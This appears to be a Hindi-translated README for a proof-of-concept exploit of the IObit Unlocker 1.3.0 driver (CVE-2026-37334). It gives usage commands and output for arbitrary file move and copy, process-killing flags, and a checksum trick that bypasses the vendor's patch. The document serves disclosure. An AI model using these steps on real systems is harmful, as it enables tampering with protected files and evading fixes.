
(0 day) CVE-2026-37334 किसी भी फ़ाइल को स्थानांतरित या कॉपी करता है। चेकसम ट्रिक के साथ पिछले पैच को बायपास करता है। IObit Unlocker v. 1.3.0
(0 दिन) किसी भी फ़ाइल को स्थानांतरित या कॉपी करता है। चेकसम ट्रिक के साथ पिछले पैच को बायपास करता है।
राइटअप: https://nathan2.com/files/iobit.pdf समग्र जानकारी: https://nathan2.com/posts/iobit/
मैंने यह इस बात को जाने बिना खोजा कि इससे पहले एक और पिछला एक्सप्लॉइट था जिसने इसे पहले खोजा था। हालाँकि, यह IObit द्वारा बनाए गए पैच को बायपास करता है। संस्करण 1.3.0 में कार्य करता है
उपयोग:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe "C:\copied.txt" "C:\t.txt" 4 1
--- अनुरोध भेजा जा रहा है ---
स्रोत: C:\copied.txt
गंतव्य: C:\t.txt
सबटाइप: 4 | फ्लैग: 1
IOCTL सफल हुआ। ड्राइवर ने 4 बाइट्स लौटाए।
सत्यापन: लक्ष्य फ़ाइल मौजूद/सुलभ है।
अधिक फ्लैग:
उपयोग: UnlockerCLI.exe <स्रोतपथ> <गंतव्यपथ> <सबटाइप> <फ्लैग>
उदाहरण: UnlockerCLI.exe "C:\Path With Space\file.txt" "C:\backup\file.txt" 3 (सबटाइप) 5 (ऑपरेशन फ्लैग)
सबटाइप: (कम से कम वे जो मैं उपयोग करता हूँ) 3=मूव, 4=कॉपी
ऑपरेशन फ्लैग: 0=हैंडल न हटाएं, 1=हैंडल हटाएं, 2=हैंडल वाले प्रोसेस को समाप्त करें, 4=प्रोसेस समाप्त करें और हैंडल हटाएं, 5??? प्रयोग।
संलग्न निष्पादन योग्य कार्यात्मक और पहले से पैच किया हुआ होना चाहिए। यदि नहीं, तो नीचे पढ़ें।
PoC को पैच करने के लिए चेकसम पैचर का उपयोग करें। इस प्रकार:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\checksumpatcher.exe C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe
मूल फ़ाइल आकार: 235449 बाइट्स
वर्तमान वैकल्पिक योग: 11044471
वर्तमान XOR योग: 43
फ़ाइल में पहले से सही चेकसम हैं। कोई बदलाव आवश्यक नहीं है।
यह निष्पादन योग्य को IObitUnlocker ड्राइवर के साथ संचार करने की अनुमति देगा।